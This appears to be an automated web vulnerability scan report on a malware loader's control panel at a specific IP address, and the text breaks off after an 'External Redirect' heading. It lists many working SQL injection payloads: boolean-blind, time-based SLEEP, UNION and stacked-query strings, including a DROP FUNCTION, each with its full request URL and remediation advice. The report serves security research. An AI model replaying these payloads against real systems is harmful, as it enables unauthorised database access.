Bunny Loader 3.1v 3/10/24 Vulnerability Scan RawPHP_DG
| Risk Level | Number of Alerts |
|---|---|
| High | 19 |
| Medium | 12 |
| Low | 10 |
| Informational | 24 |

| HTTP Response Code | Number of Responses |
|---|---|
| 413 Payload Too Large | 56 |
| 403 Forbidden | 184594 |
| 414 URI Too Long | 28762 |
| 404 Not Found | 368474 |
| 206 Partial Content | 5605 |
| 200 OK | 87787 |
| 301 Moved Permanently | 872 |
| 400 Bad Request | 7223 |
| 302 Found | 9 |

| Authentication Statistics | Number of Responses |
|---|---|
| !reports.report.stats.auth.browser.passed! | 2 |
| !reports.report.stats.auth.browser.foundfields! | 2 |
| !reports.report.stats.auth.sessiontoken.PHPSESSID! | 5046 |
| State : No Indicator | 39 |

| Technology | Version | Categories | Implies |
|---|---|---|---|
| Apache HTTP Server | 2.4.58 | Web servers | |
| Bootstrap | 4.5.2 | UI frameworks | |
| BootstrapCDN | 4.5.2 | CDN | |
| cdnjs | | CDN | Cloudflare |
| Chart.js | | JavaScript graphics | |
| Cloudflare | | CDN | |
| Font Awesome | 6.0.0 | Font scripts | |
| jQuery | 3.5.1 | JavaScript libraries | |
| jQuery CDN | | CDN | jQuery |
| jsDelivr | | CDN | |
| OpenSSL | 3.1.3 | Web server extensions | |
| PHP | 8.2.12 | Programming languages | |
| Popper | 2.9.1 | Miscellaneous | |
| Windows Server | | Operating systems | |

| High | Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%27%29%29+AND+7912%3D1403+AND+%28%28%27vmhR%27+LIKE+%27vmhR |
| Method | GET |
| Parameter | id |
| Attack | 54')) AND 6789=6789 AND (('gXVD' LIKE 'gXVD |
| Evidence | |
| Request Header | size: 752 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%29+AND+1534%3D9087+AND+%284583%3D4583&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV) AND 4080=4080 AND (5432=5432 |
| Evidence | |
| Request Header | size: 754 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%22+AND+9750%3D1167+AND+%22%25%22%3D%22 |
| Method | GET |
| Parameter | id |
| Attack | 54%" AND 8365=8365 AND "%"=" |
| Evidence | |
| Request Header | size: 807 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+4111%3D4019+AND+%22Uzoz%22%3D%22Uzoz |
| Method | GET |
| Parameter | id |
| Attack | 54" AND 1752=1752 AND "VyqD"="VyqD |
| Evidence | |
| Request Header | size: 743 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%27+AND+8878%3D3300 |
| Method | GET |
| Parameter | query |
| Attack | query' AND 4219=4219 |
| Evidence | |
| Request Header | size: 485 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 333 bytes |
| Response Body | size: 0 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | task_select |
| Attack | 1%' AND 7527=7527 AND '%'=' |
| Evidence | |
| Request Header | size: 850 bytes |
| Request Body | size: 180 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| Instances | 6 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Generic comment) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query+AND+7293%3D4638--+- |
| Method | GET |
| Parameter | query |
| Attack | query AND 5117=5117-- - |
| Evidence | |
| Request Header | size: 490 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 335 bytes |
| Response Body | size: 154 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%22%29+AND+3961%3D3329--+- |
| Method | GET |
| Parameter | query |
| Attack | query") AND 6329=6329-- - |
| Evidence | |
| Request Header | size: 486 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?query=query+AND+3439%3D5093--+- |
| Method | GET |
| Parameter | query |
| Attack | query AND 5756=5756-- - |
| Evidence | |
| Request Header | size: 662 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV+AND+9029%3D6759--+-&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV AND 9899=9899-- - |
| Evidence | |
| Request Header | size: 785 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%27%29%29+AND+6761%3D4003--+-&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | command |
| Attack | '1'=1'')) AND 9886=9886-- - |
| Evidence | |
| Request Header | size: 816 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | unit_EXEC |
| Attack | 18.9 AND 7130=7130-- - |
| Evidence | |
| Request Header | size: 850 bytes |
| Request Body | size: 158 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| Instances | 6 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54%27%29%29%29+AND+1524%3D6642%2516 |
| Method | GET |
| Parameter | id |
| Attack | 54'))) AND 3826=3826%16 |
| Evidence | |
| Request Header | size: 749 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27%29+AND+6750%3D6907%2516&id=54 |
| Method | GET |
| Parameter | value |
| Attack | '1'=1') AND 4774=4774%16 |
| Evidence | |
| Request Header | size: 789 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%29%29+AND+3912%3D6599%2516 |
| Method | POST |
| Parameter | id |
| Attack | 54%')) AND 1623=1623%16 |
| Evidence | |
| Request Header | size: 883 bytes |
| Request Body | size: 138 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| Instances | 3 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (MySQL comment) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects?query=query%27+AND+9600%3D8462%23 |
| Method | GET |
| Parameter | query |
| Attack | query' AND 2652=2652# |
| Evidence | |
| Request Header | size: 497 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--?query=query%25%27+AND+8574%3D4031%23 |
| Method | GET |
| Parameter | query |
| Attack | query%' AND 8547=8547# |
| Evidence | |
| Request Header | size: 481 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%25%22+AND+7672%3D2978%23 |
| Method | GET |
| Parameter | query |
| Attack | query%" AND 1286=1286# |
| Evidence | |
| Request Header | size: 283 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%29+AND+2865%3D5035%23 |
| Method | GET |
| Parameter | query |
| Attack | query) AND 9928=9928# |
| Evidence | |
| Request Header | size: 280 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+9178%3D7531%23 |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND 1570=1570# |
| Evidence | |
| Request Header | size: 1,078 bytes |
| Request Body | size: 129 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- - AND 1726=1726# |
| Evidence | |
| Request Header | size: 850 bytes |
| Request Body | size: 157 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%29%29+AND+6674%3D5309%23 |
| Method | POST |
| Parameter | id |
| Attack | 54')) AND 4365=4365# |
| Evidence | |
| Request Header | size: 878 bytes |
| Request Body | size: 138 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| Instances | 7 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%3BIF%286448%3D5605%29+SELECT+6448+ELSE+DROP+FUNCTION+rLMz--&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | id |
| Attack | 54%';IF(7722=7722) SELECT 7722 ELSE DROP FUNCTION MRvj-- |
| Evidence | |
| Request Header | size: 1,033 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| Instances | 1 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - MySQL < 5.0 boolean-based blind - Parameter replace (original value) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=%28SELECT+%28CASE+WHEN+%287490%3D9017%29+THEN+%27+ELSE+7490*%28SELECT+7490+FROM+mysql.db%29+END%29%29 |
| Method | GET |
| Parameter | query |
| Attack | (SELECT (CASE WHEN (4536=4536) THEN ' ELSE 4536*(SELECT 4536 FROM mysql.db) END)) |
| Evidence | |
| Request Header | size: 370 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| Instances | 1 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - MySQL > 5.0.11 stacked queries (comment) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- -));SELECT SLEEP(5)# |
| Evidence | |
| Request Header | size: 850 bytes |
| Request Body | size: 169 bytes |
| Response Header | size: 14 bytes |
| Response Body | size: 0 bytes |
| Instances | 1 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"")) AND SLEEP(5) AND (("PQXH"="PQXH |
| Evidence | |
| Request Header | size: 779 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 219 bytes |
| Response Body | size: 3,435 bytes |
| Instances | 1 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind (SELECT) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- -) AND (SELECT * FROM (SELECT(SLEEP(5)))kgZD) |
| Evidence | |
| Request Header | size: 850 bytes |
| Request Body | size: 200 bytes |
| Response Header | size: 14 bytes |
| Response Body | size: 0 bytes |
| Instances | 1 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%27%29+AND+MAKE_SET%282815%3D4252%2C4252%29+AND+%28%27ueQl%27%3D%27ueQl |
| Method | POST |
| Parameter | query |
| Attack | query') AND MAKE_SET(6740=6740,6078) AND ('Hgka'='Hgka |
| Evidence | |
| Request Header | size: 349 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| Instances | 1 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |

| High | Advanced SQL Injection - MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause |
|---|---|
| Description | A SQL injection may be possible using the attached payload. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1?query=query%22%29+RLIKE+%28SELECT+%28CASE+WHEN+%284126%3D5859%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%22YByN%22%3D%22YByN |
| Method | GET |
| Parameter | query |
| Attack | query") RLIKE (SELECT (CASE WHEN (3115=3115) THEN 0x7175657279 ELSE 0x28 END)) AND ("lLCV"="lLCV |
| Evidence | |
| Request Header | size: 388 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%25%27%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%282121%3D7848%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%28%27%25%27%3D%27 |
| Method | GET |
| Parameter | query |
| Attack | query%')) RLIKE (SELECT (CASE WHEN (8694=8694) THEN 0x7175657279 ELSE 0x28 END)) AND (('%'=' |
| Evidence | |
| Request Header | size: 593 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 542 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua-mobile |
| Attack | ?0') RLIKE (SELECT (CASE WHEN (8958=8958) THEN 0x3f30 ELSE 0x28 END)) AND ('IIJx' LIKE 'IIJx |
| Evidence | |
| Request Header | size: 789 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1%25%27+RLIKE+%28SELECT+%28CASE+WHEN+%289656%3D7648%29+THEN+1+ELSE+0x28+END%29%29+AND+%27%25%27%3D%27&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | task_select |
| Attack | 1%' RLIKE (SELECT (CASE WHEN (6114=6114) THEN 1 ELSE 0x28 END)) AND '%'=' |
| Evidence | |
| Request Header | size: 1,067 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS%25')%20RLIKE%20(SELECT%20(CASE%20WHEN%20(7616=5031)%20THEN%200x54515549413732394a41554c414d4a53%20ELSE%200x28%20END))%20AND%20('%25'='/tasks_page.php |
| Method | POST |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS%') RLIKE (SELECT (CASE WHEN (2926=2926) THEN 0x54515549413732394a41554c414d4a53 ELSE 0x28 END)) AND ('%'=' |
| Evidence | |
| Request Header | size: 609 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 204 bytes |
| Response Body | size: 301 bytes |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%283791%3D4771%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%284078%3D4078 |
| Method | POST |
| Parameter | query |
| Attack | query)) RLIKE (SELECT (CASE WHEN (8670=8670) THEN 0x7175657279 ELSE 0x28 END)) AND ((7410=7410 |
| Evidence | |
| Request Header | size: 599 bytes |
| Request Body | size: 0 bytes |
| Response Header | size: 225 bytes |
| Response Body | size: 560 bytes |
| Instances | 6 |
| Solution | Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'. If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application. |
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
Advanced SQL Injection - PostgreSQL boolean-based blind - Stacked queries |
|---|---|
| Description |
A SQL injection may be possible using the attached payload
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%3BSELECT+%28CASE+WHEN+%285664%3D7016%29+THEN+5664+ELSE+1%2F%28SELECT+0%29+END%29--&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV;SELECT (CASE WHEN (3792=3792) THEN 3792 ELSE 1/(SELECT 0) END)-- |
| Evidence | |
| Request Header - size: 870 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 225 bytes. | |
| Response Body - size: 560 bytes. | |
| Instances | 1 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
| High | External Redirect |
|---|---|
| Description |
